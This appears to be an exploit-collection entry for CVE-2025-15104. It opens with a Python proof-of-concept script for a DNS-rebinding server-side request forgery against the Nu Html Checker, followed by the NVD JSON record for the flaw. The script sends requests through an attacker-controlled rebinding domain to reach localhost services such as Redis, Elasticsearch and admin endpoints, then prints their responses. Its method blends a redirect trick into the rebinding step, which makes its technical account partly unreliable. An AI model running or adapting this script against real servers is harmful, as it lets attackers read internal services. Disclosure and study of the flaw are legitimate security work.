CVE-2025-15104

import requests import time # CVE-2025-15104 PoC - DNS Rebinding SSRF Bypass # Target: Nu Html Checker (vnu) def exploit_nu_checker_ssrf(target_url, attacker_domain): """ Exploit DNS rebinding to bypass SSRF protections in Nu Html Checker Args: target_url: URL of the vulnerable Nu Html Checker instance attacker_domain: Attacker's DNS rebinding domain """ # Step 1: Set up DNS rebinding domain that first resolves to external IP, # then quickly switches to 127.0.0.1 # This can be done using services like rbndr.us or custom DNS server rebind_domain = f"{attacker_domain}.rbndr.us" # Example DNS rebinding service # Step 2: First request - domain resolves to external IP (passes check) payload = { 'doc': f'http://{rebind_domain}/safe-endpoint' } # Step 3: Rapid second request - DNS cache expires, now resolves to 127.0.0.1 # The validator will now fetch content from localhost internal_targets = [ 'http://127.0.0.1:8080/admin', 'http://localhost:3000/api/config', 'http://127.0.0.1:6379/', # Redis 'http://127.0.0.1:9200/_cluster/health' # Elasticsearch ] for target in internal_targets: payload['doc'] = f'http://{rebind_domain}/redirect?url={target}' try: response = requests.post( f'{target_url}/?out=json', data=payload, timeout=5 ) print(f"Target: {target}") print(f"Status: {response.status_code}") print(f"Response: {response.text[:500]}") except requests.exceptions.RequestException as e: print(f"Error accessing {target}: {e}") if __name__ == "__main__": # Configuration TARGET = "http://validator.example.com" ATTACKER_DOMAIN = "attacker-controlled-domain" exploit_nu_checker_ssrf(TARGET, ATTACKER_DOMAIN)

{"cve": {"id": "CVE-2025-15104", "sourceIdentifier": "[email protected]", "published": "2026-01-16T14:15:54.317", "lastModified": "2026-01-23T16:57:18.910", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nu Html Checker (validator.nu) contains a restriction bypass that allows remote attackers to make the server perform arbitrary HTTP/HTTPS requests to internal resources, including localhost services. While the validator implements hostname-based protections to block direct access to localhost and 127.0.0.1, these controls can be bypassed using DNS rebinding techniques or domains that resolve to loopback addresses.This issue affects The Nu Html Checker (vnu): latest (commit 23f090a11bab8d0d4e698f1ffc197a4fe226a9cd)."}, {"lang": "es", "value": "Nu Html Checker (validator.nu) contiene un bypass de restricción que permite a atacantes remotos hacer que el servidor realice solicitudes HTTP/HTTPS arbitrarias a recursos internos, incluyendo servicios de localhost. Si bien el validador implementa protecciones basadas en nombre de host para bloquear el acceso directo a localhost y 127.0.0.1, estos controles pueden ser eludidos utilizando técnicas de reasociación de DNS o dominios que se resuelven a direcciones de bucle invertido. Este problema afecta a The Nu Html Checker (vnu): la última versión (commit 23f090a11bab8d0d4e698f1ffc197a4fe226a9cd)."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:validator:validator:*:*:*:*:*:*:*:*", "versionEndExcluding": "2026-01-11", "matchCriteriaId": "6A5FD28B-2330-4CF3-9170-0189849D2AB7"}]}]}], "references": [{"url": "https://fluidattacks.com/advisories/europe", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/validator/validator", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://fluidattacks.com/advisories/europe", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}